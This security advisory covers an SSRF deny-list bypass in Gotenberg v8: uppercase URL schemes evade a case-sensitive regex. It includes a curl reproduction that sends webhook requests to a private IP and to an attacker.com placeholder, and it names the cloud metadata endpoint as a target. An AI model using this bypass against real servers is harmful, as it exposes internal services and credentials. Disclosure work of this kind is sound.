Server-side request forgery (SSRF) In github.com/gotenberg/gotenberg/v8
Description
Gotenberg has case-insensitive URL scheme that bypasses webhook and downloadFrom deny-list SSRF protection
Vulnerability Details
CWE: CWE-918 - Server-Side Request Forgery (SSRF)
The default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go's net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally. Affected: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42, pkg/modules/api/api.go:199. Confirmed in Docker: http://172.17.0.1:12345/ returns HTTP 403 (blocked), HTTP://172.17.0.1:12345/ returns HTTP 202 (bypassed, TCP connection attempted). Same pattern as CVE-2026-27018/GHSA-jjwv-57xh-xr6r but in newly added webhook+downloadFrom deny-lists (commit 3f01ca1, 2026-04-07). Affected versions: <= 8.30.1. CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N = 9.1.
Summary
The default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go's net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally.
The same bypass (case-insensitive scheme) was previously reported for the Chromium deny-list in CVE-2026-27018 (GHSA-jjwv-57xh-xr6r), but the newly added deny-lists for webhook and downloadFrom contain the identical flaw.
Affected file/function: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42 (default regex), pkg/modules/api/api.go:199 (default regex)
Steps to Reproduce
1. Start Gotenberg: docker run --rm -d -p 3001:3000 --name gotenberg-test gotenberg/gotenberg:8 2. Baseline — lowercase http:// is blocked (HTTP 403): curl -s -w "\nHTTP %{http_code}" -X POST http://localhost:3001/forms/chromium/convert/url \ -H "Gotenberg-Webhook-Url: http://172.17.0.1:12345/callback" \ -H "Gotenberg-Webhook-Events-Url: http://attacker.com/events" \ -F "url=https://example.com/"...
Impact
An unauthenticated attacker can access internal network services (private IP ranges, loopback, link-local) that the deny-list was designed to block. The downloadFrom SSRF can exfiltrate content from internal services that respond with Content-Disposition headers. In cloud environments, this could allow access to instance metadata services (e.g., HTTP://169.254.169.254/latest/meta-data/). This bypasses the same security control that was patched in CVE-2026-27018.
Fix
Normalize the URL scheme to lowercase before passing to FilterDeadline, or compile deny-list regexes with the case-insensitive flag ((?i)).
Vulnerable Code
// See description for details
Steps to Reproduce
Set up the application using the default configuration
See the vulnerability details above
Impact
This vulnerability may allow an attacker to compromise the application.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 go | 8.31.0 |
Aliases
References